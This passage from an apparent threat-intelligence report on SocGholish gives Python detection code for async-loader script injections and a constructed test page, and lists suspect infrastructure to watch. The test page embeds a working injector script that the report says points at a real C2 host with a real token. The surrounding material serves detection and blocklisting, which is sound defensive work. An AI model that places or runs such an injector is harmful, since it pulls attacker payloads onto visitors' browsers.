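    """Return [(url, verdict)] for each async-loader IIFE found in a script body or HTML page."""
    results = []
    for m in LOADER.finditer(script_text):
        body, args = m.group("body"), m.group("args")
        if not all(k in body for k in ("createElement", "insertBefore", ".async")):
            continue
        urls = URL.findall(body + args)  # src may be a literal in the body or passed as an argument
        if not urls:
            continue
        url = urls[0]
        path = urlsplit(url).path
        tiny = len(m.group(0)) < MAX_LOADER_BYTES
        if tiny and TOKEN_PATH.match(path):
            verdict = "SUSPECT: tiny loader fetching a bare base64 token path"
        elif tiny:
            verdict = "review: tiny loader, but named resource path"
        else:
            verdict = "benign-looking async loader"
        results.append((url, verdict))
    return results

def hunt_page(html):
    """Just the suspect URLs, for feeding a proxy/WAF search or a blocklist."""
    return [u for u, v in classify_loaders(html) if v.startswith("SUSPECT")]

# Constructed page body: a SocGholish-shaped injector (real C2 host and token from this report, made-up
# parameter names) next to a legitimate-looking analytics loader on an invented CDN host.
PAGE = (
    "<script>var ndsx = true;(function(a,b,c,d,e){d=a.createElement(b);e=a.getElementsByTagName(b)[0];"
    "d.async=1;d.src=c;e.parentNode.insertBefore(d,e)})(document,'script',"
    "'https://editions.seattlemysterylovers.com/I8l9JljrHk9H60cUFvxRBFHrRwRLqxNHRq4MU025DklN6wA=');</script>\n"
    "<script>(function(w,d,s,u,a,m){a=d.createElement(s);m=d.getElementsByTagName(s)[0];a.async=1;"
    "a.src=u;m.parentNode.insertBefore(a,m)})(window,document,'script',"
    "'https://cdn.example-analytics.invalid/v2/tracker.js');</script>\n"
)
```

Both loaders on the constructed page are under 300 bytes, so the size threshold alone would flag the benign one too; the token-path check is what keeps the hit rate usable when this is run over proxy-captured responses.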

Network Neighborhood Monitoring -- monitor the 190.211.254.0/24 range for new SocGholish infrastructure. The analytics-style domains (wwstat.co, maxstat.co, cdnmetrics.co, cdnscore.co) in this range should be added to watchlists as potential TDS components.


Published by Breakglass Intelligence. Investigation conducted 2026-03-09. 11 MalwareBazaar samples analyzed. 5 live C2 servers confirmed across 4 providers and 3 countries. 4 compromised organizations identified. Classification: TLP:CLEAR
